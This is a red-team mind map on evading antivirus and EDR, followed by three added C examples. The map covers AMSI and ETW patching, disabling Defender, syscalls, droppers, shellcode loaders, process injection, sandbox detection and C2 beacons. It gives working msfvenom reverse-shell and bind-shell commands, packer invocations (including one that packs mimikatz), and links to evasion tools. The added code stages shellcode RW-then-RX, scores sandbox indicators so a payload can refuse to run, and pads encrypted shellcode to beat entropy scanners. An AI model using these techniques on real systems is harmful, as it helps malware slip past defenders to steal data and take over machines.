Bypass AV/EDR (mind map, flattened into an outline)

Branches: Dropper, Manual loader, Automatic loader, Generate shellcode, Manual obfuscation, Automatic obfuscation, Process injection, Detect virtual machines (Sandbox), From PE to shellcode, From alive beacon, Extensions, plus the nodes on neutering the defences themselves (AMSI bypass, Disable ETW, Disable AV, Block DLL, Direct/Indirect syscalls).

AMSI Bypass
  - Static (patch the AMSI code in memory)
      https://rastamouse.me/memory-patching-amsi-bypass/
      https://www.mdsec.co.uk/2018/06/exploring-[...]-and-logging-evasion/ (middle of the path lost in extraction)
      https://github.com/Hagrid29/PELoader
  - Dynamic (patchless, e.g. via a debugger-style hook)
      https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/
      https://github.com/CCob/SharpBlock

Disable ETW
  https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32
  https://github.com/Soledge/BlockEtw
  https://github.com/CCob/SharpBlock
  https://www.mdsec.co.uk/2020/03/hiding-[...] (rest of the path lost in extraction)

Disable AV
  https://github.com/APTortellini/unDefender

Block DLL
  https://github.com/CCob/SharpBlock

Direct syscalls
  https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a
  https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/
  https://www.cyberbit.com/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/ (same article, second URL)
  - Indirect syscall
      https://github.com/optiv/ScareCrow
      https://github.com/klezVirus/SysWhispers3
      https://github.com/jthuraisamy/SysWhispers2

Dropper
  - Office macro: https://github.com/sevagas/macro_pack
  - LOLBIN
  - RemComSvc

Extensions
  - Hta
  - Cpl
  - Exe
  - Dll
  - Link (.lnk)

Manual loader
  Description: every loader does the same three things:
    1. allocate memory
    2. move the shellcode into that memory
    3. execute the shellcode
  - RWX: put your region in RW, write your shellcode, then reprotect it to RX, then run the thread. This way the region is never RWX (a permission combination scanners look for).
  - WaitForSingleObjectEx (wait on the thread so the process does not exit before the payload runs)
  - Delayed execution: https://evasions.checkpoint.com/techniques/timing.html#delayed-execution
      Ekko: a small sleep obfuscation technique that uses the CreateTimerQueueTimer Win32 API
      Foliage
      DeathSleep: https://github.com/janoglezcampos/DeathSleep
  - C++
      https://blog.securityevaluators.com/creating-av-resistant-malware-part-1-7604b83ea0c0
      https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/
      https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8
      https://www.purpl3f0xsecur1ty.tech/2021/03/30/av_evasion.html
      Minimal DLL-based loader (the shellcode lives in shellcode.dll and runs from its DllMain):

        #include <iostream>
        #include <Windows.h>

        int main(void) {
            // Loading the DLL is what executes it: LoadLibrary runs DllMain.
            HMODULE hMod = LoadLibraryA("shellcode.dll");
            if (hMod == nullptr) {
                std::cout << "Failed to load shellcode.dll" << std::endl;
                return 1;
            }
            return 0;
        }

  - C
      https://github.com/CMEPW/Selha/blob/main/C/aes-loader-stageless.c
      https://github.com/reveng007/ReflectiveNtdll
  - Nim
      https://github.com/aeverj/NimShellCodeLoader
      https://github.com/sh3d0ww01f/nim_shellloader
  - Go
      https://github.com/EddieIvan01/gld
      https://github.com/zha0gongz1/DesertFox
  - Rust
      https://github.com/b1tg/rs_shellcode
      https://github.com/r4ime/shellcode_loader
      https://github.com/cr7pt0pl4gu3/Pestilence
  - Crystal
  - Python: https://github.com/icyguider/Shhhloader
  - .NET
      https://github.com/TheWover/DInvoke
      https://thewover.github.io/Dynamic-Invoke/
  - ASM
      https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/
      https://github.com/ReversingID/Shellcode-Loader/tree/master/windows

Automatic loader
  https://github.com/klezVirus/inceptor
  https://github.com/optiv/ScareCrow
    ScareCrow -I /Path/To/ShellCode -d facebook.com
  https://github.com/optiv/Freeze
    Freeze -I /PathToShellcode -encrypt -sandbox -o packed.exe
  https://github.com/phra/PEzor
    PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2
  https://github.com/optiv/Ivy
  https://github.com/xuanxuan0/DripLoader
  https://github.com/TheD1rkMtr/D1rkLrd
  https://github.com/cribdragg3r/Alaris

Generate shellcode
  - msfvenom
      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER> LPORT=<PORT> -f raw
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll
      msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more
      (bad characters go after -b; the third command strips the C formatting so the bytes can be pasted into a loader)
  - Staged and stageless
      A staged payload is a small stager plus a separately delivered stage: the stager calls back and fetches the rest of the payload, so there are several exchanges (often 2) between client and server before the payload runs. A stageless payload is self-contained. The stage travelling over the wire is what gets signatured, so if you use meterpreter set the following before generating or starting the handler:
        set EnableStageEncoding true;
        set StageEncoder x64/xor_dynamic;

Manual obfuscation
  - Packing: https://pentester.blog/?p=39
      Pro tip: a shellcode run through 3 open-source packers has a higher chance of being caught than one with manual obfuscation, because the packers' stubs are themselves signatured.
  - Polymorph: https://www.exploit-db.com/papers/13874
  - Signature hiding
      https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates
      https://github.com/paranoidninja/CarbonCopy
      https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb
  - ROP
  - CFG
      https://improsec.com/tech-blog/bypassing-control-flow-guard-on-windows-10-part-ii
      https://joshpitts.medium.com/hooking-control-flow-guard-cfg-for-fun-and-profit-31f951485545
  - CFG flattening
      http://ac.inf.elte.hu/Vol_030_2009/003.pdf
      https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=ade1cc22ee994c1b353326ae4cedccd29f33b8d0
  - Static
      Change logo/icon: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/resources?redirectedfrom=MSDN
      Change date of compilation
  - Entropy
      https://github.com/kleiton0x00/Shelltropy
      https://github.com/optiv/ScareCrow

Automatic obfuscation
  - Tools
      https://github.com/klezVirus/Chameleon
      https://github.com/tokyoneon/Chimera
      https://github.com/danielbohannon/Invoke-Obfuscation
      https://github.com/optiv/ScareCrow
      https://github.com/EgeBalci/sgn/
      https://github.com/DavidBuchanan314/monomorph
  - Packing
      https://github.com/govolution/avet
      https://github.com/upx/upx
      https://github.com/Nariod/RustPacker
      Hyperion: wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe

Process injection (https://attack.mitre.org/techniques/T1055/)
  - Remote thread (CRT, CreateRemoteThread)
      https://sevrosecurity.com/2020/04/08/process-injection-part-1-createremotethread/
      https://damonmohammadbagher.medium.com/bypassing-anti-virus-by-creating-remote-thread-into-target-process-45f145b2ac7a
  - APC (Asynchronous Procedure Call)
      https://subscription.packtpub.com/book/security/9781789610789/8/ch08lvl1sec50/executing-the-inject-code-using-apc-queuing
      https://github.com/LloydLabs/ntqueueapcthreadex-ntdll-gadget-injection
      User APC
  - Process hollowing
      https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations#relocation
      https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/
  - Thread execution hijacking (with a suspended thread): https://attack.mitre.org/techniques/T1055/003/
  - Process Doppelganging: https://thehackernews.com/2017/12/malware-process-doppelganging.html
  - Reflective DLL injection
      https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html
      https://github.com/fancycode/MemoryModule
  - DLL injection: https://www.ired.team/offensive-security/code-injection-process-injection/dll-injection
  - DLL Sideloading & Proxying: https://book.hacktricks.xyz/windows-hardening/windows-av-bypass#dll-sideloading-and-proxying
  - COM Hijack
      https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/
      https://0xpat.github.io/Abusing_COM_Objects/
  - PSC (Ptrace System Calls)

Detect virtual machines (Sandbox)
  - Count process number: if >= 40, it's probably not a VM
  - User interaction: send a MessageBoxW and wait for the click
  - Software
      Check for internet
      Datetime on compilation
      Check for computer name: VM = DESKTOP-[0-9A-Z]{7}
  - Hardware
      A typical user workstation has a processor with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive; anything smaller is suspicious.
      CPUID timing
  - Sample code: https://github.com/CMEPW/bof-collection/blob/main/src/checkVM/checkVM2.c
  - OSX: https://evasions.checkpoint.com/techniques/macos.html#macos-sandbox-methods
  - Tools: https://github.com/a0rtega/pafish

From PE to shellcode
  https://github.com/hasherezade/pe_to_shellcode
  https://github.com/S4ntiagoP/donut/tree/ (path truncated on the page)
  https://github.com/monoxgas/sRDI
  https://vxug.fakedoma.in/papers/VXUG/Exclusive/FromaCprojectthroughassemblytoshellcodeHasherezade.pdf

From alive beacon
  - C2 (Cobalt/Havoc, whatever)
      Havoc
      Cobalt
        BoF (Beacon object file)
          https://github.com/trustedsec/CS-Situational-Awareness-BOF
          https://github.com/CMEPW/bof-collection/
          C: https://github.com/trustedsec/COFFLoader
          From .NET to BoF: https://github.com/CCob/BOF.NET
          dotnet (object file)
  - Network
      C2 by DNS
      P2P (hide the C2 IP behind peer beacons)
      HTTPS

Credits
  @Jenaye_fr
  LeDocteurDesBits
  michmich1000
  @Zabannn
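Worked example for the Manual loader branch (the three steps plus the RWX note). This is an added example, not code from the mind map or from any of the loaders it links. It uses POSIX mmap/mprotect in place of VirtualAlloc/VirtualProtect so it builds and runs on a Linux or macOS host with a plain C compiler; the "shellcode" is a constructed stub that just returns 42, chosen so the result can be checked. The point it shows is that the region is mapped RW, filled, and only then flipped to RX, so no RWX mapping ever exists.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Constructed sample "shellcode" for the demo: a function returning 42. */
#if defined(__x86_64__) || defined(__i386__)
static const unsigned char sample_code[] = {
    0xB8, 0x2A, 0x00, 0x00, 0x00,   /* mov eax, 42 */
    0xC3                            /* ret         */
};
#elif defined(__aarch64__)
static const unsigned char sample_code[] = {
    0x40, 0x05, 0x80, 0x52,         /* mov w0, #42 */
    0xC0, 0x03, 0x5F, 0xD6          /* ret         */
};
#else
#error "no sample code for this architecture"
#endif

/* Stage a buffer the way the map describes: allocate RW, copy, flip to RX,
 * execute. Returns the code's return value, or -1 on failure. The mapping is
 * never readable+writable+executable at the same time. */
int run_staged(const unsigned char *code, size_t len)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    size_t size = ((len + page - 1) / page) * page;   /* 0 for len == 0 */

    /* 1. allocate memory, RW only (VirtualAlloc PAGE_READWRITE equivalent) */
    void *region = mmap(NULL, size, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (region == MAP_FAILED)
        return -1;

    /* 2. move the shellcode into that memory */
    memcpy(region, code, len);

    /* 3a. reprotect to RX (VirtualProtect PAGE_EXECUTE_READ equivalent);
     *     from here on the region can no longer be written */
    if (mprotect(region, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(region, size);
        return -1;
    }
    /* required on split I/D-cache architectures such as aarch64 */
    __builtin___clear_cache((char *)region, (char *)region + size);

    /* 3b. execute (a real loader would CreateThread + WaitForSingleObjectEx) */
    int (*fn)(void);
    memcpy(&fn, &region, sizeof fn);   /* object -> function pointer without a cast warning */
    int result = fn();

    munmap(region, size);
    return result;
}

int run_staged_demo(void)
{
    return run_staged(sample_code, sizeof sample_code);
}

int main(void)
{
    printf("staged code returned %d\n", run_staged_demo());
    return 0;
}
```

A length of 0 makes mmap fail, which the function reports as -1 rather than dereferencing an empty mapping; that is the same failure path a Windows loader should take when VirtualAlloc returns NULL.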
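Worked example for the Detect virtual machines (Sandbox) branch, combining the map's heuristics (process count, computer name pattern, hardware minimums, internet reachability) into one scorer. This is an added example, not code from the mind map or from checkVM2.c/pafish. Collecting the facts is OS-specific (on Windows: GetComputerNameW, a Toolhelp process snapshot, GlobalMemoryStatusEx, GetDiskFreeSpaceExW), so the example only scores values already gathered into a struct; the two sample hosts are constructed. The DESKTOP-[0-9A-Z]{7} name is also what a fresh unjoined Windows install gets, so it counts as one weak indicator and the verdict requires at least two hits.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Facts the checks look at; filling this in is the OS-specific part. */
struct host_info {
    const char *computer_name;
    int      process_count;
    int      cpu_cores;
    unsigned ram_gb;
    unsigned disk_gb;
    bool     has_internet;
};

/* Exact match for the default Windows name pattern DESKTOP-[0-9A-Z]{7}. */
bool is_default_desktop_name(const char *name)
{
    static const char prefix[] = "DESKTOP-";
    size_t plen = sizeof prefix - 1;
    if (name == NULL || strncmp(name, prefix, plen) != 0)
        return false;
    const char *tail = name + plen;
    if (strlen(tail) != 7)
        return false;
    for (size_t i = 0; i < 7; i++) {
        unsigned char c = (unsigned char)tail[i];
        if (!isdigit(c) && !(c >= 'A' && c <= 'Z'))
            return false;
    }
    return true;
}

/* One point per heuristic from the map that looks sandbox-like. */
int sandbox_score(const struct host_info *h)
{
    int score = 0;
    if (h->process_count < 40) score++;   /* >= 40 processes: probably not a VM */
    if (h->cpu_cores < 2)      score++;   /* workstation: at least 2 cores      */
    if (h->ram_gb < 2)         score++;   /* ... at least 2 GB of RAM           */
    if (h->disk_gb < 100)      score++;   /* ... and a 100 GB disk              */
    if (!h->has_internet)      score++;   /* sandboxes often cut the network    */
    if (is_default_desktop_name(h->computer_name)) score++;  /* weak on its own */
    return score;
}

/* Two independent indicators before refusing to run: a single hit (e.g. only
 * the default name) is too common on real machines to act on. */
bool looks_like_sandbox(const struct host_info *h)
{
    return sandbox_score(h) >= 2;
}

/* Constructed sample hosts for the demo. */
const struct host_info sample_sandbox     = { "DESKTOP-4K7QJ2M", 22, 1, 1, 60, false };
const struct host_info sample_workstation = { "WS-FINANCE-17", 140, 8, 16, 512, true };

int main(void)
{
    printf("sandbox sample:     score %d, sandbox=%d\n",
           sandbox_score(&sample_sandbox), looks_like_sandbox(&sample_sandbox));
    printf("workstation sample: score %d, sandbox=%d\n",
           sandbox_score(&sample_workstation), looks_like_sandbox(&sample_workstation));
    return 0;
}
```

The CPUID timing check from the same branch is deliberately left out: it needs inline assembly and a calibrated threshold per CPU, and its result is not reproducible in a unit test.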
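Worked example for the Entropy node under Manual obfuscation (and for the `--encrypt rc4` msfvenom option under Generate shellcode): encrypting the shellcode removes the byte signatures but pushes the blob's entropy close to 8 bits/byte, which is itself a detection feature; Shelltropy-style padding brings the average back down. This is an added example, not code from the mind map or from Shelltropy. The "shellcode" is a constructed NOP-sled-plus-stub buffer, and a xorshift32 keystream stands in for RC4 (it only needs to be uniform enough to show the effect). log2 is implemented inline so the file links with a bare `cc` and no -lm.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SAMPLE_LEN 4096

/* log2 without libm: reduce x to m * 2^e with m in [1,2), then
 * ln(m) = 2 * atanh((m-1)/(m+1)) by its series. Valid for x > 0. */
static double log2_nolibm(double x)
{
    int e = 0;
    while (x < 1.0)  { x *= 2.0; e--; }
    while (x >= 2.0) { x *= 0.5; e++; }
    double z = (x - 1.0) / (x + 1.0), z2 = z * z, term = z, sum = 0.0;
    for (int k = 1; k < 60; k += 2) { sum += term / k; term *= z2; }
    return (double)e + (2.0 * sum) / 0.6931471805599453;   /* / ln 2 */
}

/* Shannon entropy of a byte buffer in bits per byte (0.0 .. 8.0). */
double shannon_entropy(const uint8_t *buf, size_t len)
{
    size_t counts[256] = {0};
    double h = 0.0;
    if (len == 0) return 0.0;
    for (size_t i = 0; i < len; i++) counts[buf[i]]++;
    for (int b = 0; b < 256; b++) {
        if (counts[b] == 0) continue;
        double p = (double)counts[b] / (double)len;
        h -= p * log2_nolibm(p);
    }
    return h;
}

/* 7.0 bits/byte is a common scanner threshold for "packed or encrypted". */
int looks_encrypted(const uint8_t *buf, size_t len)
{
    return shannon_entropy(buf, len) > 7.0;
}

/* Toy keystream (xorshift32) standing in for the RC4 keystream that
 * `msfvenom --encrypt rc4` applies. Not secure; only uniform enough. */
static void xor_keystream(uint8_t *buf, size_t len, uint32_t state)
{
    for (size_t i = 0; i < len; i++) {
        state ^= state << 13; state ^= state >> 17; state ^= state << 5;
        buf[i] ^= (uint8_t)state;
    }
}

/* Constructed stand-in for raw shellcode: a NOP sled with a short repeating
 * stub at the front. Low entropy, like typical unencrypted msfvenom output. */
static void build_plain(uint8_t *out)
{
    static const uint8_t stub[] = { 0x48, 0x31, 0xC0, 0x90 };   /* constructed bytes */
    memset(out, 0x90, SAMPLE_LEN);
    for (size_t i = 0; i < 64; i++) out[i] = stub[i % sizeof stub];
}

double demo_plain_entropy(void)
{
    uint8_t b[SAMPLE_LEN];
    build_plain(b);
    return shannon_entropy(b, SAMPLE_LEN);
}

double demo_encrypted_entropy(void)
{
    uint8_t b[SAMPLE_LEN];
    build_plain(b);
    xor_keystream(b, SAMPLE_LEN, 0x1234ABCDu);
    return shannon_entropy(b, SAMPLE_LEN);
}

/* Shelltropy-style: interleave every encrypted byte with a low-entropy filler
 * byte so the blob the scanner sees averages well under the threshold. The
 * loader drops the filler (here: every odd byte) before decrypting. */
double demo_padded_entropy(void)
{
    uint8_t b[SAMPLE_LEN], padded[SAMPLE_LEN * 2];
    build_plain(b);
    xor_keystream(b, SAMPLE_LEN, 0x1234ABCDu);
    for (size_t i = 0; i < SAMPLE_LEN; i++) { padded[2 * i] = b[i]; padded[2 * i + 1] = 0x00; }
    return shannon_entropy(padded, sizeof padded);
}

/* Reference point: one of every byte value gives the 8.0 maximum. */
double entropy_all_byte_values(void)
{
    uint8_t all[256];
    for (int i = 0; i < 256; i++) all[i] = (uint8_t)i;
    return shannon_entropy(all, sizeof all);
}

int main(void)
{
    printf("plain     %.2f bits/byte\n", demo_plain_entropy());
    printf("encrypted %.2f bits/byte\n", demo_encrypted_entropy());
    printf("padded    %.2f bits/byte\n", demo_padded_entropy());
    return 0;
}
```

Run the same measurement on the final dropper, not just on the shellcode blob: a low-entropy loader with a high-entropy resource section still stands out to a scanner that computes entropy per section.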